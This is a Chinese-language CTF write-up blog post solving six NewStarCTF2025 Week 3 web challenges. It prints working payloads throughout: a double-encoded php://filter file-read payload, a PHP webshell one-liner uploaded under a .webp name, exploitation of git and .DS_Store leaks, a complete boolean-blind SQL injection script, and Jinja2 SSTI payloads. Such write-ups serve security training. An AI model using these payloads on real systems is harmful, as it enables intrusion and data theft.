NewStarCTF2025-Week3-Web

kali-Myon2025-10-27 16:21

目录

1、mygo!!!

2、ez-chain

3、小E的秘密计划

4、mirror_gate

5、白帽小K的故事(2)

6、who'ssti

1、mygo!!!

存在flag.php

直接用file协议读

2、ez-chain

URL+rot13编码绕过一下就行了

python 复制代码 
def double_encode(s):
    return ''.join('%25{:02x}'.format(ord(c)) for c in s)
s_root_flag = "php://filter/read=string.rot13/resource=/flag"
print(double_encode(s_root_flag))

Payload:

python 复制代码 
?file=%2570%2568%2570%253a%252f%252f%2566%2569%256c%2574%2565%2572%252f%2572%2565%2561%2564%253d%2573%2574%2572%2569%256e%2567%252e%2572%256f%2574%2531%2533%252f%2572%2565%2573%256f%2575%2572%2563%2565%253d%252f%2566%256c%2561%2567

3、小E的秘密计划

提示备份文件,直接试一下www.zip

提示git

找到用户名和密码:git cat-file -p f3d34d7cb96b5bcdcda980a1413d2e35154e98de

提示mac写的这段代码

应该存在DS 泄露,访问 .DS_Store

拿到文件名之后访问即可看到flag

4、mirror_gate

源码里看到提示

扫描一下,存在配置文件

会将 .webp 的文件当做php解析

直接传,内容稍作绕过即可:

<?=`tac /f*`?>

5、白帽小K的故事(2)

提示盲注

很明显可以看到回显不同

布尔盲注

过滤了空格,用括号换个写法就行了

flag不在当前数据库,在Flag数据库

表名和字段名都是flag

Exp:

python 复制代码 
# author:My6n

import requests
import string

url = 'https://eci-2zefxfrs15rs8gpgz6j6.cloudeci1.ichunqiu.com:80/search'
dic = string.digits+string.ascii_letters+'{}-_,'
out = ''
Cookie = {'Cookie':'Hm_lvt_2d0601bd28de7d49818249cf35d95943=1759757336,1759973191,1760016294,1760146947'}
for j in range(1,80):
    for k in dic:
        #payload = {"name":"amiya'&&if(substr(database(),1,1)='t',1,0)#"}
        #payload = {"name":f"amiya'&&if(substr((select(group_concat(schema_name))from(information_schema.schemata)),{j},1)='{k}',1,0)#"}
        #payload = {"name":f"amiya'&&if(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='Flag')),{j},1)='{k}',1,0)#"}
        #payload = {"name": f"amiya'&&if(substr((select(group_concat(column_name))from(information_schema.columns)where((table_schema='Flag')and(table_name='flag'))),{j},1)='{k}',1,0)#"}
        payload = {"name": f"amiya'&&if(substr((select(flag)from(Flag.flag)),{j},1)='{k}',1,0)#"}
        re = requests.post(url, data=payload ,cookies=Cookie)
        #print(re.text)
        if "ok" in re.text:
            out += k
            break
    print(out)

6、who'ssti

提交的内容会被Jinja2 当作模板渲染

调用到随机生成的那些函数就可以了

Payload:

python 复制代码 
{{ lipsum.__globals__.__builtins__.__import__('re').findall('a.', 'abcab') }}

{{ lipsum.__globals__.__builtins__.__import__('difflib').get_close_matches('apple', ['ape','april','apple']) }}

{{ lipsum.__globals__.__builtins__.__import__('random').choice([1,2,3,4]) }}

{{ lipsum.__globals__.__builtins__.__import__('json').load(lipsum.__globals__.__builtins__.__import__('io').StringIO('{"a":1}')) }}

{{ lipsum.__globals__.__builtins__.__import__('statistics').fmean([1,2,3,4]) }}
相关推荐
changlianzhifu19 小时前
当支付飞入寻常巷陌,安全与便捷如何双向奔赴?
安全
枷锁—sha9 小时前
【PortSwigger Academy】SQL 注入绕过登录 (Login Bypass)
数据库·sql·学习·安全·网络安全
运筹vivo@9 小时前
攻防世界: fileinclude
web安全
paixingbang10 小时前
企业级API接口如何选?星链引擎4SAPICOM以稳定、高效、安全成为市场优选
安全
逍遥德11 小时前
PostgreSQL 中唯一约束(UNIQUE CONSTRAINT) 和唯一索引(UNIQUE INDEX) 的核心区别
数据库·sql·postgresql·dba
工业甲酰苯胺11 小时前
字符串分割并展开成表格的SQL实现方法
数据库·sql
小句12 小时前
SQL中JOIN语法详解 GROUP BY语法详解
数据库·sql
昊昊该干饭了13 小时前
一个真实查询需求如何从表设计走到高效 SQL
数据库·sql
Elastic 中国社区官方博客15 小时前
使用瑞士风格哈希表实现更快的 ES|QL 统计
大数据·数据结构·sql·elasticsearch·搜索引擎·全文检索·散列表
pengweizhong16 小时前
Dynamic‑SQL2 查询篇:MyBatis 增强利器,让 SQL 像写 Java 一样丝滑
java·sql·教程
热门推荐
01GitHub 镜像站点02OpenCode 入门教程:介绍 · 安装 · 配置第三方 API (如 Claude)032025 Telegram 最新免费社工库机器人(LetsTG可[特殊字符])搭建指南(含 Python 脚本)04UV安装并设置国内源05安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)06在VSCode配置Java开发环境的保姆级教程(适配各类AI编程IDE)07BongoCat - 跨平台键盘猫动画工具08Claude Code Skills 实用使用手册09AI 规范驱动开发“三剑客”深度对比:Spec-Kit、Kiro 与 OpenSpec 实战指南10Linux下V2Ray安装配置指南